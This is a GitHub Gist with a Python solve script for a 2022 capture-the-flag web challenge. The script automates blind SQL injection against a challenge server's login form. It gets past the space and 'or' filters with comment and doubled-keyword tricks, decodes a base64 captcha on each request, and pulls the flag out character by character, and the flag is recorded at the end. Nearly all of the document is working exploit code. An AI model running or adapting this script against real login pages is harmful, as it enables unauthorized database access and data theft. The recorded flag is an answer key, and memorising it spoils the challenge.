Last active
August 6, 2022 15:12
-
-
Save seifallahhomrani1/6789ab4e8f66f8e46f405e3d9285b60d to your computer and use it in GitHub Desktop.
Kenzy Web Challenge from Arab Security Cyber Wargames Championships 2022
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import base64 | |
| import string | |
| addr = "http://34.175.249.72:60001" | |
| flag = "" | |
| for l in range(1,50): | |
| for c in string.printable[:-6]: | |
| #final payload to extract the flag | |
| # /**/ to bypass ' ' filter | |
| # oorr to bypass or filter | |
| payload = f"a'/**/oorr/**/{ord(c)}=(select/**/ascii(substr(flag,{l},1))/**/from/**/solve)#" | |
| #previous payloads can be constructed from https://defendtheweb.net/article/blind-sql-injection | |
| s = requests.Session() | |
| #captcha will be generated on every session | |
| s.get(addr) | |
| captcha = s.get(addr+'/scripts/captcha.php') # getting the captcha response | |
| encoded = (captcha.text[len(captcha.text)-13:-1]).encode('utf-8') # preparing the encoded captcha | |
| final = base64.b64decode((base64.b64decode(encoded))) # decoding | |
| h = s.post(addr,data={'username':'admin','password':payload,'captcha':final,'send':'Send'}) # username and password are both vulnerable to blind sqli | |
| if 'username' not in h.text : # checking errors | |
| flag+=c | |
| print('Flag:', flag) | |
| break | |
| print(flag) #ASCWG{23fsdc$@#EAScasq12_hard} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment